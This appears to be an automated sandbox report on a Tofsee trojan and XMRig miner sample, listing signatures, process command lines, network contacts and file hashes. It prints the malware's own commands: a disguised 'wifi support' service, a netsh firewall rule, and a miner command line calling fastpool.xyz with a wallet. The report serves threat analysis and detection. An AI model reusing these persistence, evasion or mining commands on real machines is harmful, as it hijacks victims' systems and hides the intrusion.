Malware Analysis Report

2025-08-05 13:21

Sample ID 231119-3vt5eadf5y
Target 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.zip
SHA256 d67fc64d34afd907136004df31bd8c6309f4904094fce34e873fa361ac76e0dd
Tags
tofsee xmrig evasion miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d67fc64d34afd907136004df31bd8c6309f4904094fce34e873fa361ac76e0dd

Threat Level: Known bad

The file 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.zip was found to be: Known bad.

Malicious Activity Summary

tofsee xmrig evasion miner persistence trojan

Tofsee

xmrig

XMRig Miner payload

Creates new service(s)

Modifies Windows Firewall

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-19 23:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-19 23:50

Reported

2023-11-19 23:55

Platform

win7-20231020-en

Max time kernel

5s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

Signatures

Tofsee

trojan tofsee

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\permvqxi\

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe" C:\Windows\SysWOW64\permvqxi\

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" create permvqxi binPath= "C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d\"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe\"" type= own start= auto DisplayName= "wifi support"

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" description permvqxi "wifi internet conection"

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" start permvqxi

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\svchost.exe

svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 microsoft.com udp
US 20.112.250.133:80 microsoft.com tcp
US 8.8.8.8:53 microsoft.com udp
US 8.8.8.8:53 microsoft-com.mail.protection.outlook.com udp
US 52.101.8.49:25 microsoft-com.mail.protection.outlook.com tcp
US 8.8.8.8:53 vanaheim.cn udp
RU 158.160.73.47:443 vanaheim.cn tcp
RU 80.66.75.77:483 tcp
US 8.8.8.8:53 13.71.61.154.dnsbl.sorbs.net udp
US 8.8.8.8:53 13.71.61.154.bl.spamcop.net udp
US 8.8.8.8:53 13.71.61.154.zen.spamhaus.org udp
US 8.8.8.8:53 13.71.61.154.sbl-xbl.spamhaus.org udp
US 8.8.8.8:53 13.71.61.154.cbl.abuseat.org udp
US 8.8.8.8:53 yahoo.com udp
US 8.8.8.8:53 mta5.am0.yahoodns.net udp
US 98.136.96.74:25 mta5.am0.yahoodns.net tcp
RU 62.122.184.92:427 tcp
UA 45.143.201.238:427 tcp
RU 176.113.115.84:427 tcp
RU 80.66.75.4:427 tcp
RU 176.113.115.135:427 tcp
RU 176.113.115.136:427 tcp
N/A 83.97.73.44:427 tcp
NL 142.251.39.100:80 www.google.com tcp
NL 142.251.39.100:80 www.google.com tcp
NL 142.251.39.100:80 www.google.com tcp
NL 142.251.39.100:80 www.google.com tcp
NL 142.251.39.100:80 www.google.com tcp
NL 142.251.39.100:80 www.google.com tcp
NL 142.251.39.100:80 www.google.com tcp
US 8.8.8.8:53 www.google.ru udp
NL 142.251.36.35:443 www.google.ru tcp
US 8.8.8.8:53 oauth.vk.com udp
RU 87.240.129.181:443 oauth.vk.com tcp
FR 52.98.228.34:993 tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 smtp.google.com udp
NL 142.250.102.26:25 smtp.google.com tcp
US 8.8.8.8:53 fastpool.xyz udp
BG 213.91.128.133:10060 fastpool.xyz tcp
US 8.8.8.8:53 work.a-poster.info udp
NL 37.1.217.172:25000 work.a-poster.info tcp
RU 87.240.129.181:443 oauth.vk.com tcp
US 8.8.8.8:53 mail.ru udp
US 8.8.8.8:53 mxs.mail.ru udp
RU 217.69.139.150:25 mxs.mail.ru tcp
US 8.8.8.8:53 api.luisaviaroma.com udp
NL 104.110.240.155:443 api.luisaviaroma.com tcp
LT 93.115.25.10:80 93.115.25.10 tcp
RU 80.66.75.77:483 tcp
US 8.8.8.8:53 13.71.61.154.in-addr.arpa udp
LT 93.115.25.73:80 93.115.25.73 tcp
RU 87.240.129.181:443 oauth.vk.com tcp
LT 93.115.25.13:80 93.115.25.13 tcp
RU 87.240.129.181:443 oauth.vk.com tcp
NL 37.1.217.172:25000 work.a-poster.info tcp
US 8.8.8.8:53 www.sivasdescalzo.com udp
US 104.18.232.222:443 www.sivasdescalzo.com tcp
US 104.18.232.222:443 www.sivasdescalzo.com tcp
US 8.8.8.8:53 registrierung.web.de udp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
NL 37.1.217.172:25000 work.a-poster.info tcp
DE 217.72.199.5:443 registrierung.web.de tcp
RU 87.240.129.181:443 oauth.vk.com tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp
DE 217.72.199.5:443 registrierung.web.de tcp

Files

memory/2216-1-0x0000000000690000-0x0000000000790000-memory.dmp

memory/2216-2-0x0000000000220000-0x0000000000233000-memory.dmp

memory/2216-4-0x0000000000400000-0x00000000004F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe

MD5 41e5c245a82a8504a70527e839ae883e
SHA1 080f8d3a98ac6769752e221403d17354a4afa0b5
SHA256 51fd31d38d471d045b16fd4b4fedc2cd52aedfe29845cc212e8d61bf5758e746
SHA512 b281798cb0e3cf7c7bcf001dc7ff8f5f10af5e3b6c6ac12d286a0d07fb9e7d718c8b2c4e5f32df7fd50f4e7de92e1eefd353f7cb5a6b4d537dfae67648188b69

memory/2216-6-0x0000000000400000-0x00000000004F3000-memory.dmp

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe

MD5 9bbc5d1f6be289e2071874e4a8e1815a
SHA1 362815bd2e08ecca3f49caa89dc21b2fbd104dcf
SHA256 c0ae437eaa40a777b2087deaadd1fabe001c2fc6208f54033b7eaa39847a3847
SHA512 fce8a86aaa9284f5edc42a69af9ca3bcaaa3b524877b13a55705f330876f5c0871f46fd216aef955f541ac231379af2866ae8eca7805fb8c03114b7991aac525

memory/2760-9-0x00000000005F0000-0x00000000006F0000-memory.dmp

memory/2764-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2760-16-0x0000000000400000-0x00000000004F3000-memory.dmp

memory/2764-19-0x0000000000080000-0x0000000000095000-memory.dmp

memory/2764-18-0x0000000000080000-0x0000000000095000-memory.dmp

memory/2764-20-0x0000000000080000-0x0000000000095000-memory.dmp

memory/2764-14-0x0000000000080000-0x0000000000095000-memory.dmp

memory/2760-12-0x0000000000400000-0x00000000004F3000-memory.dmp

memory/2764-10-0x0000000000080000-0x0000000000095000-memory.dmp

memory/2764-22-0x00000000019C0000-0x0000000001BCF000-memory.dmp

memory/2764-29-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-38-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-49-0x00000000006D0000-0x00000000006D5000-memory.dmp

memory/2764-52-0x00000000006D0000-0x00000000006D5000-memory.dmp

memory/2764-53-0x0000000005830000-0x0000000005C3B000-memory.dmp

memory/2764-48-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-47-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-46-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-57-0x00000000009F0000-0x00000000009F7000-memory.dmp

memory/2764-56-0x0000000005830000-0x0000000005C3B000-memory.dmp

memory/2764-45-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-44-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-43-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-42-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-41-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-40-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-39-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-37-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-36-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-35-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-34-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-33-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-32-0x0000000000430000-0x0000000000440000-memory.dmp

memory/2764-26-0x0000000000190000-0x0000000000196000-memory.dmp

memory/2764-25-0x00000000019C0000-0x0000000001BCF000-memory.dmp

memory/2764-61-0x0000000000080000-0x0000000000095000-memory.dmp

memory/1276-63-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-62-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-72-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-77-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-76-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-75-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-74-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-73-0x0000000000260000-0x0000000000351000-memory.dmp

memory/1276-71-0x0000000000260000-0x0000000000351000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-19 23:50

Reported

2023-11-19 23:55

Platform

win10v2004-20231023-en

Max time kernel

132s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe

"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 48.254.221.88.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 67.254.221.88.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

N/A